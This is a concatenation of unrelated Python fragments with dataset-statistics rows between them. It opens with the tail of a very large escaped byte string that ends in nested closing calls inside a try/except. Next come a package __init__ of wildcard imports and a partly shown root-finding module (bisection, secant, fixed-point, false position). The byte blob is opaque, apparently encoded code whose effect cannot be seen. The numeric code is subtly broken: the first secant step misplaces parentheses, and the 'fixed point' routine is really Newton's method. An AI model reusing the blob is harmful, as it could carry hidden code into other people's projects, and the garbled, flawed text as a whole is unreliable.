7b\xcb\xed\x9fh\xe7w\xcc\x00]\x90}\x9c\x98\x92^\x04\xf5\xf8B\xd7\xeb\xc5n(\xd3\x90.\x0fx\xf6\xd1\xfe\x1a\'\xcf\xb26\xf9tv&H\x00W\xe7\xea\xc8\xdf\x15\x05%\xb2\xb5i\xe3\xe3\x82w\xd7+\x15\x8c\xd1\xd8\x99\x07\x1c\xaex\xce\x82\xd3y]/\x7fU9\xd0\x1dsA\x19N\xbd\xc7Z\x9c\xcd\xdd\xf7\xaaJ\xc4o%\xd1\xc9\xef?\xf8\x10\xa9\t\xa9\xe6q6\xca\x06\x071yUt\x07c\xaeV\x1b>P\xe2\x0e?A\x84n~\x80\x9f\xe6\xde\x84P\x85\xfe\x12\xde&\x9f\x98?\xd2<\xf66Y\xf5\xe5\xe20\xe1\x104\n\xe4\xab#N\x08\xfc\x92\xc3\xeb\xdeO\xbc\x97\xf6\xe1\xba&\xa7F\n\xdeD\xed\x88*]\xb2\x1f\xaa\xc1\x1aeOX\xd1;K\x01\xdeD\x05sM\xd7cf\x01\x01\xcf\xe4\xf1\xeb\xe8\x80\x19\xcagF\xd1xq$\\\x95\x8bc\x93\xc0\xb1\x94j\xf1F\xfb-\xe9A~dA\x93\x95(\x8e\xa7\x8e\xfa\xab\x1e\x18\x1c\xe7\xa5\x97UE\xddE\x06\xd0|\x15\x1d9\xf0\xd0\xdc\xc6\x82(\x87\xfb\x03\xffy#AS]\x8eUJ\x9e\xa0\xb2_2)FFE\xd3\xf0\n\x15)\xfdQz\x8aw\xc1\x01\xdd=\xa5\x8a\x1b\x95"pk\x0b$;I\xb7V\xff\x03r\x8a\xf16yC\xe6\xa2;\xc4\xc7\xaf\xf6\xe5\x08^\xeb\x96\xb7\xe1\xc14`\x03\x10\t\xea\xa86Z\xb4\xc2\xaa\xf4hP\x14i\xa7\xa3;TqrY\xd1:\xe3\x96\xc6\x87\x1c\xe9p\xfc\xd2~Hd\xeeP\xe9I\xb7\xd2\xd8\xb0\xcd\xcb\x96&D\xc7\xc8^<Gk\x158C\x9a\xa1\x1a\xf8\xad\x06\x92\xdbH<R\xf4\x04$O\x04Z\xea\x8c\xf3QI\x16\xcc\xcd\xfa\xba\xb7\x94\xc4(\x8c\xd1\x89\xab\xd2\x81P\xcdL>yi0l\xa2:\xa7q(9\xd6+\x93z\xab\xaa\xdb\x1d8\x18N|i\x1b\x99\x86\xe25Tt\xa1f\x84\x13\xe5\x15w\xf7\x9f\x081.\xf4QbWT\xdd\xd1\xc0\xcew\x0c\xa1\xa8\x95d\xe1\xc3\xb1\xc3}-:]\x11\xe8\x1a\t\x0f\xb1\xed\xd6\xa5\x84\xa1)m2\xa0)\xd5\xcd\xef\xd1\xc8\xc3>\r\x1b~\x9d?\x07\xe4\x98\xbf\xa7w,\x88\xe4D\x88\x1b\x9a\x80\xbd<\xb9\x91+_\x8f\x1e_\x1e\x86g1\xc9\x01>\x94~\xe0\x85\xcd\x18\x99J\xe6\xad\x8eq\xaa\xa1P\xbc/\x87\x160\xe7Z\xf8\xdb\xd9\xc0\xe6\xf8O\x8c\xce\xe8\x8e\x19\xcd\xf2\xec6\x86\x8e0>N\xa0\x12\x8f=,\xab\xf3F}\x16SF\x1e\xf4\xa7Ta\xe0\x02c\xc8X{\xf5\xff\xbc\x08I\xa4\x9a1U\x01\xe6\xb0\xd5\xf9\xc0B\xbf\xd6>\xeel_\xfe\xc8\xf5\xdfK\x15\xfb\xe4\x04L\xcc\x08\x1f\xd2\xa1Lk\xb5l~\xe3\x95`[m\xb8Is\xf6Y\x0em\xd7\xcai\x10p2`\x8e\x96\x95\xd81\x87\xfd [\x07e/6>6\x05\xe9\x96 \r\xaf\r\xf6\x9a`%3\x85\x9e\xdc\x95B$\x19.\xd2\x8cv\x07s\xc4\xc6\x9a\xeer\xc0\x07k{\x16\x85)\x9ag\xf9\xea\x93N\xf4Ra\t\r\xd4\xb5u\xb5\x8d\x1b\xb7\x19\x11x\x95\x83\x0cJe\x9a\x0b\xca*<\x85V"Q\x1b\x8d1\xc4\xaf0\xbap-\xb7\x8c\x87\xba+^(\x880u\x9a\xbd\x05\xa7\x85\xd1c\xe9V\xb4\x99\xd2v\x0b\xba\xbeF`@g\xf6Px\'\xcf.q\xe6\x81\xfcr\xf5\x1c\xae\xee-pW\xd8C\x83c^AB\xdai\xd5z\xc7-\x00[\x13\xec\xd4Z\xb1\xd9\x88A\xfb\xb3\x95I\xed\x81m1\xc8J\xe0\x16\xc30\xbcb !\xa3(:?\xfd#\xce-\xbb\xb4\xdd\x01\x19*\x81\x16\x8c\xe2\xd3\xb4g\x00\x045\x888O\xba\xe1\x180\xf3]5\xbb\x8c\xea\xe9\xdc\x1b\xf4\x8a2\xbf\x0f\xb3\x8c\x1f\x1a&\x08\xd3\xeb\xa2\xd9\x03\xaa3\xdf\xf4\xa3m\xeb\xd2\x1d\xc1\xf5\x92\xe7\xd8\xec\x0e\x9e\xee\xb1s\x01\xc1E\x9c\xf9\xe1\xc7GuIm\x1c1k7V\xf9d\xf3hQ#q\x80\x92\xaa\xa9\xe5\xe8\x04\xab\x98\xeaFX\x87\xe6`\xa4\xcc\xd4P+Ec\xc8\x0e1Nmv|A\x05\xc4SiLkM\x82yN\xdf_\x1453\x17\x0e\xcc\xb0\xd94\xe6\xfe1\xf9,\xfa\x17\xea\xa4\x91\x9b9{\x0b\xf9eQ\xb3\xe0\x94\xc6M\xec\xb9R&j\xa0\xc7\xcb\x1b\xbf\x15\x8f3\xa4\xd9\x11\xde\xbd\xfd@\x98!\xb6$~\x92\x0c\xe7dU\x1e\xd2&\xfaL\xdc8z\x8d\x83\r@Gv\xf3&\x12\xe4V\x9e\x1e\xc5\x10\xf3bZ\x8f5\xf2\xe8\x980\xe5Z\x92DP\x1ca\x83\xac\x8a\xe0\xa7\x0c\xc50\x0e\xb0.\x1b\x19\x8e\xf1\xe8w?s\x1b\x1a\xd6-\xa6\xf1\x0c\x7f\xf8Xu&r\xcc\xbb\xec\xf8\xa9l\xae\x822\xed\xbfAF\xa0k\xbf(r\xb5\xb9\xbd\xbb\xa8\x9c_\x91\xb7\xacYz/\xf6\x84\x97\x00\xcf[^B0i<K\xc8\xf7\x10C \x0b\x84y\xa0\xa8\x9bJ\x15\'U\xf6\xf3\x81\x9e\n7.\x93b\xb3\xf7\xeb\x9e|u3\xc1\xfa\xdd\xb3\xb7\x08\xa8\x83\x13rt#\xe4\xe0\xca\xde\xff\x16db\x0b\x03c\x9d\xaa\xbc\\S\x1dD\x8ef\xfe\xe8\xe1GAf\x82\xa3\xb0\xef\xf1\x0e\x93D]\xbc\x12\n\x06w;\xea\x93S\xb5\xad\xdc\xdbZYBU\xc1\xf5eO\x824|\xd4t\x93}\xd2\xd1\x9e\x1b\x99\xfe0\xe6\xbfl\x0b\xde/\xc1\xda\xcd\r\xea>h\xed\xea\\\xbb\x90\xdb\xd4l-7\xd1\x8b\x04{IB4)\x13\xfa\x8b\xdb\xdf\xa6\x1aZ\xb4\xea\xde]%\r5\x83\x84\xec\xa9XP.\xdd\xae^O\xbc\xda\xce\xf2\xd3o2f`\xf5U\xfc\xfd\xac\x84"e>u\x12X\xb5]\xf6\xfb\xb5\x10bN\x97\xd5\x15\\\x9d2\xab\t\xaed\xe5\xb38\xd3\xd3\xe4U4u\xd3\x81\xc1\xc9<O\xaaa\xd7~\x8a\xa2\x8d\xdc\x90V\x13\xa4Z\xe7\x8c\xcd\xbe\xc0\xf1\xc1m\xabo2\x1b\x82\x8by\xfa\xfe\'\xe6\xa8\x89\x8cU\xb9\xbd\x92>l\x86\xf1\xb1\xc4\x89o$=\x0b\x14\xdf\xe2\tSKXX\xffx%\xdf\x05\xa7\xae\x8f\x89\x8ak\xf5\x1b\x01e\xf9\xf4\x82"\xcfJ\xd2\xb8\x8bH\xb3\x93\x03\\\x19\xd5)\xa5\x02\x01,| |\xfes\'\xeez\x83\xec\xaa\x8e\xf60\x9a\xd3\xd20\xb7\xe9E\x95\xa0|\x85*\x91\xdf\x13[\x82P\x08\xdb\xf4(2f\xb6\xa0\xec?Lw[\xc0\x84N\xcdN\xa4\x90D\xd3\xbf\xb0\x87K\xcf\xcc\xbd\x98\x86\xa0\xe6\xcbx\xff\xa0\xffP\x12b\xa0\x1b\x89\x18\xf8\xd6?\xb9x\x13c\x99\xf1\xfbw\xaa\xf3\xe7\x10w\x14\xb0<\xb0\x029\xc8\x0f\x94&\xa4\x91\x8b\x14\xa1\xde\x1c3\x18B\xc7\xac\x86\xd1\x95\x83\xb7W\xb5#h,\xb3\xbe$\n\xcd\x85\xca;\x9a\x7f\xc3\x07\'&\x86x/\x06\xb6AJY\xa2,\xb9\xc6\xf4\xfe}%/\x17\xd1\xd3\xcd\xda\xec\xde\x97\x83\xb09r~\xc4\xd2N\x0c\xc9\xc6}\x95yb\xfaY\x90\x8bNc\xd2\x1d\x14~\xde\xc68N\xe5\xca\xb1\x98\xf1\xff^P3\xd6\n\x90T\xc7\xda\xca\x97\x87\xd2[\xea\xc0$k+=|rYw\x98\xcf#\xda\xd0\xacf&\x148\xaem\x14\x03\xb4\xbbR&\xaaU\x80\x8ec\xa3\x9ed+Kq\x00\xc4\xe9:\xe7\xfcKO4Jd*^O\r\xbbJ\x1e[\xae\xcb\xb2\xa1\xca\xd7e\xcb\x1d9P\xad\x16\x02\xedC+ED\xb7\x12\r\'\x16c\xf4\xba\x8e.\x87\xd3\xc0Oy\x05\x8dzfgF\xf3\x1bA$D\x01H\x9f\xb5"\xd1\xdbv\x1c\xb4\x1aH=js-\xaf\x91CYo,B\xbf\xb0\xd3\xc8\x8f\x05\xcd7\x1f\x87\xd4\x87\xd2T\xfb\xa1&5\x8e\x02\x1fA\xdb\xb6\xc0\xcc\x94\xfd\xa4|\xb2\xda6\n7\xe4uD\x91\x88\x97\x8e\xbeK/8\x1d~/\xa4\x012\xb5`$-\xbdx%G\xd1\x86\x8c\xda\xae\x9a\xa6\xa3\xbc\xcc\xf8\xe3\x8c\xc7T\xc5]h\x1f\xf0\xcb[\x1e\xdd\xf8\x17\x81Um\xd5]\xf1\xe5\x9b,\x025\x03\xc0\tk\xba"^\x9c\x95\xf6\x1c#7;E\xac5i\xa1O\xb5\xd8P]o\xf3\xfd\x00\x80\xa4\xf4\x92\x8ag\xab Q\xf6\xc2\x95\x10\x1d\x0eY\xe6\xb0\x87T\xdbH\x16\xa0\x83\x11\xa2\xb3;\xe6g\xfb\x7f\xab\xfd\x8fq\xb0\xbe\xa4"\x8f\xe1)tu\xcb\x82\xcb\x0f\x92\xe9I\x0e/\x0e#V\x1f\xeb\xf5\xec\x93`N\xc5\xc3\x05\xdf\xb1\xe6\xf3\x04\xee\xea\xb2\x16\xb3Uc\x18\xd5@\xad\x12\x14B\xf4\x12n\xe1\xfds\x95f\x9d\x0ez<z\x16\xa9L\x943\xbaaA\x88\xadp`\xf1\xbf\x9b8\x0e\x10K\x93B\xb9\xf4:{\xe6\xbfi,\x86\x1d\xedz\x96c\xd6\xab}\x1d\x96\xf1\xb6~=\x8f\x1d\x94\xf6\xf1F\xfa\x93\xb4\xc1\x91\xe6\x7f\x01\x0ec}\xa8i\xaa\x8f6D\xb2gHzg\xf8x\x92}\xf8L\xe9\x84\x8d\x89\xa2/\xdc\xd4\x05\xa6\xf6\\>\x10\x00Zhj\xce\xe7\x96\xd9\xbd"\x82\x93:\x13)\xcaMd8c\x07\x1d\x17\xc5\xbb\x8c\x10\xee\xf73*\x15\xc4\x8c\x0f\xe1}\x1b\x1as\x971\xed\xe0\xce;\xfd\x96N,\xd3k\x98\x9a\x12L\x88\xbcy\xdd\xf3p\x94\xb71\xae7\xa3\x15\x94\x80\xb5\xca\x8f\n\x07/XY\xfd\x11RH+\xa7\xad\xf0\xc0\xc4\xa0^+cf+\xf0\xbd\x81a~g\x17\x95Wj\xe4\xb5\xe0\xa4U\xa8\xba\x83\xf7ZE7\x14Hld\xbaW\x17j\xe8{\x97`u\xb5o\xe8\x88<.^\x08\x8dJ\x0b\xc8\xc0\xe9\x0cB\xa7\xb7M\xf5\xd6\xc9\xbaN\r\x0b\x9f4\x9f\xbe]\xd7\xf0<\x11\xcee)X\xff&\x9d\xacNW6\x13\xd0\x8d$R\xa0\x91\x05\xd4\x8c\xd1\xbe\x19~\x92\xe9\x87\xb0\x13Q\x16H\xf4\xbe\x94\xa4\x9a\xce\\9y\xc5f\x89\xad\xf2\xed\xc3\xfd\xc5p\x99:P-\xdb\x144\x8d\x9eG\x94\x86q\xb3\x10\xfffV\x03\xe5\xaa\xba\xa7I!\x9b\xd9F\\\xafv\xfdx\n\xc1mM$\x9bp\xbb\xdcx+)\x12m\xab\x90S\x07\xf0\xb6\xaaG>\xc5\x9ea\x99\xb2\xe8l\xa0\x0e\xaa@\xe86\x1a\x82\xc4\xc8\x02\x8e\xf4Xz\x02Jlf+\xe95A\xae$\x02\r\xea\x92\x15\x1f\xcejD_\xd97\x12\xfd\x0b\x81\xa1\x05_u\xa2Q\x18a\xcb\xea\xcf\xe1mBWc\xba>\xe1i\xd5v\t\xc9\xbd\xf5\xdf\x9f\x8bwsu\t\x8eb\xa0\xf3\xd3u\xe5F\x97\xbb#\xea\xd6E\x08\xae\xfc\xe5\x98\xbc\xdb(\xee\x87\x8bY\xb4\x98#y\xa1\nE}\xff\x16\x1c\x82\xd9RS%\xb40\xfbYk\xd9c\xd3\xcc&g\xe4\xe5\xe2\xe6\xe6qO\xe0S\xe0\xbb\xb5\x17Z\xcb\x0ct\x01r\x94\xbc\xf1\x8a\x9f\xec\x10\xf4\xc5f\xd6\\\xcc\x8b\xe5KI\x88\xd16B\xa2\xf7\xb1D.<\xb0\xeby1t\x19\t\x1b\x8b{\xcaaV\xff+\'"=1\\\xdc\x04P\n\x0b\xba\xb6\x1e[\xfd\x0f\xe1g5\xe6/\xd8\x98\xad\x0eKC\x7f\xb0:ztJ\tL\xbaP_\xc4u\xd5l\xf4\x0c\xab\xe1\xdb\xd2\n\xa8\xf3\x02{mv2-\x8f\x02\x98\xf37p\x9e\xeebz\xa9\x12f\xbd\xb9\xa3f\xcd\xdcW\x99j\xcb\xc9qI\xb2\xa8\x19s\xdf\xf6C\x8d\xe0\x05\xea0y\xcbT8\x87\xe1~_S\x81\\_>9\x96\xd3zO\x16(\xccp c\xf3\xd1\xd6\x18S\xa0\xa6\x84\xad\x181\x0c\xc8sA YC\x13*\xb07+\xec-\xdcW3M\xa2\xb0>\n\xe8\xfb\xe9PZ\xcc\\\xc4\xa1T\x9b@\x80\xc0R\xb2\x07\x99\r\xf4\x0fu\xf1\xc3\x80k\xd5\xa3\xd2\x01\x96\x17p\x80$\x07\x994\x94:\xd2!\xf1>\xdf"\x01\x99B\x11\xab9\xb9Ux\xaa\x17\x7f\x92\x04\xe8\xf4uT7`\xb7_\x1a\t\xcf<\xc1\x8dj~J\xe1\xda@J;\xf1\xf7|9\xb07c\x98%\xac\xd3\x1b\x85EU\xe9\xe3\'\x9a\x98\x89\xc0\x1a\xbaS\x88\xbf,F\xaa\x0e\r"\xab\xdf\xe4\x85\xf4\x0fU\xbb\x08\x8dr\x17\xa3\x8e\x08\xbf0Q\xf6\x85d]L&\xf3"8\xd0\xeb\xcc\xcd\x0fxB\x89\x02p\xaeCB\xdcF8q\xac\x9c\x15\x92PL\xed\x8a\x07ZN\x1f~\xd7\xfa\xcde\x93\x96\x86UI\xa4\xbc\x06\x89\xfe\xaa\x06\xe1d\x10O7\xab\x10A\xbd\xa1\xd4\xdb\x8cFi\xea\xe7\x184\xcc\xd3\xfd\xd9\x0e,Q\x92\xa8\xc6\xf5K0cM\xa2\xc1\x0es\xb9\xd8&\xa70\xc2\xe9\xca[XO\x1b\xeaX\xbc\x98\xb2\xed\x9f)\x99@\xcb>\x87\xe5)\xddS.\x07\x9elU/2s\x05\n\xb3f+\x16\xde\x86\x1b\x18\xd8Wo\xd9*\xad\x8aW\xd5\xac\xf6\x91J\xcc\x91\x0bU$\x8f?\xbe\x12\x86"\xe5\x91q\xf2\nN\xda\tqZ#,EU\xcfO\xad1B\xa8\xb48\xaffV\xff;\xbb\xd4\xda\x8a\\\x91\xb2\xcc&\xe8\xe9\xff,C3\xe2\x80\xb2\xb0\x8e\xc3\xff\xb4\xb2;\xaf"\xdd=:\x1a\x12,\xfa\xfe@\xb5+\x0fj\xfeq&\xd3|n\xce\xe7\x03\x0b\x84\xda@[^\xfd\x053\xd9\xfc\xa4]\xce;\xd5\x9e\xcadt\xe4\nR\x983&\xc8#\x86\xa8b\'\x84^\xca\x08\xfar:\xe8#\xa0\x123p*=\xc2\xb5]\xfe\xb3\x01-\xae?Z\xdd\x03#\xb2\x9d\xa4}e\x88\xce\xdc\x1b\x1f\xfc\xe2\xa4y\xc8KG\xaf_\t\x9eY\xe2\xb4/\x7f\x80\x19\x9a\x90\x11\xf1\\\x97\xb5;\x7f4\x884\n\xe9\x13\xd3\x04mg\x9fH\xad\x92\xc9\x02\x81\x04\xb3\xd6\xbc\x90\xc7\x1a\xdc\x83\x03%\xeaH\xf8\xb3\x1c\r\xbb\xe2\xec\x81\x00&\x1a\x7fP\xd5\x94\r\xff\xd0q\xe0\xd5\xe7\x97\xd2P\x05\x87\x82\x03R\x01\xa6\x87_=\x17>\x87\xe3\xa5\xee\xd6\x85\xad\'\xd2\x952V\x15;F\x92,\xaa3q\x1a\xab\x90\xa4V\x7fa\x01\'y\xaf\xc9O9K\xab\xc5\x89!\xbd\x03L\x9d\x96\xfbFyc\xf2\x98\x8a\xf0M\xf8\t\x8a\x95\xde?}K\xedF\xfe\x9d\xeao\xd9\xa6\x8c|\xb9vRQ\x92\xe2\x88\xf8R\x9db\xe5=n\xfb\xb5In\xdc\x19\xe0\x8a\xc3\x99\x1a\xbe\xcb-t\xf1\x94\x16\xf3\xa6\x16*\xcd\xf4\x0b\x8e\xc2paZ\xe9\xaeMy$\xb6\x0e_\xa1\xcfu\xf7\x9f\x86\xba\x95^4\x8d\xbe=/\xf4\xdc\xf4\x841\xb4\x9f\xa8D\xd9Tm\x9bI@\x1f\xad\x86Pw\xd5=X\x13\xf8\xbf\x8f"\x10\xfe\xee\x83,<\xbc6v\xfewF\x96I$\xf7\x1dCo\xe2\x94N\xdc\xb9\x17"C\xb7\x88\x8doe\xb9\x10L[kz\x1f\x0c\xa9\xba\xaf\x12\xf0\x80M\xf9\xb3\x01\xd2\xd7\xa5\xbf\xe7\x1b\xf9HW\'\xef\xe0\xcf\x93\x94\x12\x8c7\xc5\xc9\xbd\'\xb7\x7f\xe2O>\x80\xd2\xdd\x9cl\xba\x07\xe7\xb7U\xda\x92[\xdd\x9c\x1ch3\x8dnE\xd9\xe3j`\xba\xed\xec\x1f\x05]:\xf9:\x02\xd6r12-\xd5w%Z\x04=y\x86\xb4\x91\xf3\xe9\xa4\x91N\xb4\r&\x03\x87H\x97\xf3\x9b\'o\xbc\xae~\x82\xdf%O!\x97\\\xea%{\x7fn\xfc\xd2\xf8:Vp\xb1\x88\x08N\x9ez\x94\xb8\xf44\xc1A\x9e\x8f)\xcb\xdf\xcc\xcd\xd6\xe4#\xf4\xb1\xc7\x90\xe77\x99"0\x83C\x8e\xb0-\x99\x94\x84h\xccO\x82\xef\x14\x85\xc4\xc8\x0c\xc8\xa2\xa3\xd8\x8c\xa5\x80\xc6\x7f\tDe\xad\xc4\xa5\x89\x07\xe0\xd3PF\xe7\xc4\x19i\xa586\xfc\xe7l\xb5\xff\xf6\xe8h\xffh\xa8\xf9;$[\xe0dH\x9e\xf0!\x1e\xac\xb1\xc7]!\x08\xd2\x94\xbf\xec\xd1\xf1&\xfc\xf6\xf9\xe5UA\xb2g\x8f\xdd\xd6\x96\xbe\xee\xfd<\xdb:\x88\xff\x7f\xb6\xbb\x15_\xa4\xd7\x05]\x04\xa5\x1d\xbb\xfb\x16V\xdeW_\xec\xb5\x9d\xdb\xffup\xd4\x1d\x87\xaf\xfbo\x11h\xdd\xdf\xda\xdf\xd3\xf7&\xf1\x05\xf2\x83\xa3\xad\xbd\xbe\x8eY\xc3`*s\xfd\x19\xfe\xdf\x97\xf1w\xfa\x13D\xab\x86\xf7\xf9\xf4\xd7~{\xb2\x8b|\x05\x93\xdc\xfc^:\x7f\r\xbe\xbc\xa7G\xdcI\xbdd\xa29]\xe4\x92\x189m\xb6\xf5\xc0;\xab\xb9~\xc5\xffFGG\xff\xaf\xe3g\x18\xba\xfe(C\xf6x\xa8y\xcc\xf7\x7f\xcf\xdf\xba\xbe\xd8\xe7\xcd\xc5\xd0\xad\xd1\xff\x01\xdc\xc2^\xf6\x05\xfe\x01\x00')))
except Exception as b:
print(f'Error for : {b} ')
| 15,790.454545
| 173,536
| 0.734097
| 39,918
| 173,695
| 3.18801
| 0.16812
| 0.00033
| 0.000141
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.228264
| 0.00137
| 173,695
| 11
| 173,537
| 15,790.454545
| 0.505399
| 0.000282
| 0
| 0
| 0
| 32.2
| 0.638884
| 0.637151
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.2
| 0
| 0.2
| 0.2
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0d8c555014d6c345faed3b6ff060a2f717fb32cc
| 164
|
py
|
Python
|
pyckaxe/lib/pack/resource_loader/__init__.py
|
Arcensoth/pyckaxe
|
09ed0828d6660a233b827721454293579329991b
|
[
"MIT"
] | 3
|
2018-09-23T05:16:44.000Z
|
2021-12-23T03:06:07.000Z
|
pyckaxe/lib/pack/resource_loader/__init__.py
|
Arcensoth/pyckaxe
|
09ed0828d6660a233b827721454293579329991b
|
[
"MIT"
] | 5
|
2018-07-11T02:31:56.000Z
|
2018-07-11T03:15:05.000Z
|
pyckaxe/lib/pack/resource_loader/__init__.py
|
Arcensoth/pyckaxe
|
09ed0828d6660a233b827721454293579329991b
|
[
"MIT"
] | null | null | null |
from .abc import *
from .common_resource_loader import *
from .json_resource_loader import *
from .nbt_resource_loader import *
from .text_resource_loader import *
| 27.333333
| 37
| 0.817073
| 23
| 164
| 5.478261
| 0.391304
| 0.31746
| 0.634921
| 0.571429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.121951
| 164
| 5
| 38
| 32.8
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
0dc59398bbc0f04688049b0f112a10f309082e10
| 11,517
|
py
|
Python
|
nupy/iterative_methods/iterative_methods.py
|
begeistert/nupy
|
b1026afc21b9a985a3329f1a16006aec8fa4d726
|
[
"MIT"
] | null | null | null |
nupy/iterative_methods/iterative_methods.py
|
begeistert/nupy
|
b1026afc21b9a985a3329f1a16006aec8fa4d726
|
[
"MIT"
] | null | null | null |
nupy/iterative_methods/iterative_methods.py
|
begeistert/nupy
|
b1026afc21b9a985a3329f1a16006aec8fa4d726
|
[
"MIT"
] | null | null | null |
from nupy.sympy_algebra import evaluate, derive
from pandas import DataFrame, set_option
def __configure__():
set_option("display.precision", 20)
set_option('colheader_justify', 'center')
def intermediate_value(function, variable, intervals, tolerance=1e-10, limit=250, just_root=False):
"""
Gets the root of the given expression through iterations
====
:param function: Expression to iterate
:param variable: Expression variable
:param intervals: Iteration intervals
:param tolerance: Error tolerance
:param limit: Iteration limit
:param just_root: Switch between DataFrame and root
:return: Return a DataFrame if just_root is not or false,
otherwise return the root of the expression
"""
__configure__()
iterations = {
'a_n': [],
'b_n': [],
'p_n': [],
'f_n': []
}
header = ['a_n', 'b_n', 'p_n', 'f_n']
fa_1 = intervals[0]
fb = intervals[1]
pn_1 = sum(intervals) / 2
condition = evaluate(function=function, variable=variable, value=fa_1) * evaluate(function=function,
variable=variable,
value=fb)
iteration_1 = 0
if condition < 0:
while True:
if iteration_1 == 0:
fn_1 = evaluate(function=function, variable=variable, value=pn_1)
fx_1 = evaluate(function=function, variable=variable, value=fa_1) * fn_1
iterations['a_n'].append(intervals[0])
iterations['b_n'].append(intervals[1])
iterations['p_n'].append(pn_1)
iterations['f_n'].append(evaluate(function=function, variable=variable,
value=pn_1))
if fx_1 < 0:
fx_1 *= -1.0
if fx_1 < tolerance:
break
else:
fb = pn_1
else:
if fx_1 < tolerance:
break
else:
fa_1 = pn_1
iteration_1 += 1
else:
pn_1 = (fa_1 + fb) / 2
fn_1 = evaluate(function=function, variable=variable, value=pn_1)
fx_1 = evaluate(function=function, variable=variable, value=fa_1) * fn_1
iterations['a_n'].append(fa_1)
iterations['b_n'].append(fb)
iterations['p_n'].append(((fa_1 + fb) / 2))
iterations['f_n'].append(fn_1)
if fx_1 < 0:
fx_1 *= -1.0
if fx_1 < tolerance:
break
else:
fb = pn_1
else:
if fx_1 < tolerance:
break
else:
fa_1 = pn_1
iteration_1 += 1
if iteration_1 > limit:
break
data = DataFrame(iterations, columns=header)
return data if not just_root else iterations["p_n"][iteration_1 - 1]
def secant(function, variable, intervals, tolerance=1e-10, limit=250, just_root=False):
"""
Gets the root of the given expression through iterations
====
:param function: Expression to iterate
:param variable: Expression variable
:param intervals: Iteration intervals
:param tolerance: Error tolerance
:param limit: Iteration limit
:param just_root: Switch between DataFrame and root
:return: Return a DataFrame if just_root is not or false,
otherwise return the root of the expression
"""
__configure__()
iterations = {
'x_n': [],
'f(x_n)': []
}
header = ['x_n', 'f(x_n)']
x_0 = 0.0
x = 0.0
n_iteration = 1
while True:
if n_iteration == 1:
x_0 = intervals[0]
x = intervals[1]
fx_n_1 = evaluate(function, variable, x)
fx_n = evaluate(function, variable, x_0)
x_x_0 = x - x_0
x_x = (x - fx_n_1 * x_x_0) / (fx_n_1 - fx_n)
iterations['x_n'].append(x)
iterations['f(x_n)'].append(fx_n)
e_x = fx_n
if e_x < 0:
t_r = e_x * -1.0
if t_r < tolerance:
break
else:
x_0 = x
x = x_x
else:
if e_x < tolerance:
break
else:
x_0 = x
x = x_x
n_iteration += 1
else:
fx_n_1 = evaluate(function, variable, x)
fx_n = evaluate(function, variable, x_0)
x_x_0 = x - x_0
if fx_n_1 - fx_n != 0:
x_x = (x - fx_n_1 * x_x_0 / (fx_n_1 - fx_n))
else:
break
iterations['x_n'].append(x)
iterations['f(x_n)'].append(fx_n)
e_x = fx_n
if e_x < 0:
t_r = e_x * -1.0
if t_r < tolerance:
break
else:
x_0 = x
x = x_x
else:
if e_x < tolerance:
break
else:
x_0 = x
x = x_x
n_iteration += 1
if limit > 0:
if n_iteration > limit:
break
elif n_iteration > 250:
break
elif n_iteration > 250:
break
data = DataFrame(iterations, columns=header)
return data if not just_root else iterations['x_n'][len(iterations['x_n']) - 1]
def fixedPoint(function, variable, intervals, tolerance=1e-10, limit=250, just_root=False):
"""
Gets the root of the given expression through iterations
====
:param function: Expression to iterate
:param variable: Expression variable
:param intervals: Iteration intervals
:param tolerance: Error tolerance
:param limit: Iteration limit
:param just_root: Switch between DataFrame and root
:return: Return a DataFrame if just_root is not or false,
otherwise return the root of the expression
"""
__configure__()
iterations = {
'x_n': [],
'f(x_n)': []
}
header = ['x_n', 'f(x_n)']
diff = derive(function, variable)
x0 = intervals[0]
x = "x-((%s)/(%s))" % (function, diff)
xn = evaluate(x, variable, x0)
niter = 0
iterations['x_n'].append(x0)
iterations['f(x_n)'].append(xn)
cond = x0 - xn
if cond < 0:
cond *= -1
while cond > tolerance:
x0 = xn
xn = evaluate(x, variable, x0)
niter += 1
iterations['x_n'].append(x0)
iterations['f(x_n)'].append(xn)
cond = x0 - xn
if cond < 0:
cond *= -1
if limit > 0:
if niter > limit:
break
elif niter >= 250:
break
elif niter >= 250:
break
data = DataFrame(iterations, columns=header)
return data if not just_root else iterations['x_n'][len(iterations['x_n']) - 1]
def falsePosition(function, variable, intervals, tolerance=1e-10, limit=250, just_root=False):
"""
Gets the root of the given expression through iterations
====
:param function: Expression to iterate
:param variable: Expression variable
:param intervals: Iteration intervals
:param tolerance: Error tolerance
:param limit: Iteration limit
:param just_root: Switch between DataFrame and root
:return: Return a DataFrame if just_root is not or false,
otherwise return the root of the expression
"""
__configure__()
x_0 = intervals[0]
x = intervals[1]
n_iteration = 1
iterations = {
'a_n': [],
'b_n': [],
'p_n': [],
'f_n': []
}
header = ['a_n', 'b_n', 'p_n', 'f_n']
condition = 0.0
stop = False
x_x = 0.0
t_r = 0.0
e_x = 0.0
while not stop:
if n_iteration == 1:
fx_n_1 = evaluate(function, variable, x)
fx_n = evaluate(function, variable, x_0)
x_x_0 = x - x_0
x_x = (x - fx_n_1 * x_x_0 / (fx_n_1 - fx_n))
fp_n = evaluate(function, variable, x_x)
iterations['b_n'].append(x)
iterations['a_n'].append(x_0)
iterations['p_n'].append(x_x)
iterations['f_n'].append(fp_n)
f_n = evaluate(function, variable, x_0) * fp_n
if f_n > 0:
e_x = fp_n
if e_x < 0:
t_r = e_x * -1.0
if t_r < tolerance:
break
else:
if fp_n > 0:
x = x_x
elif fp_n < 0:
x_0 = x_x
else:
if e_x < tolerance:
break
else:
if fp_n > 0:
x = x_x
elif fp_n < 0:
x_0 = x_x
else:
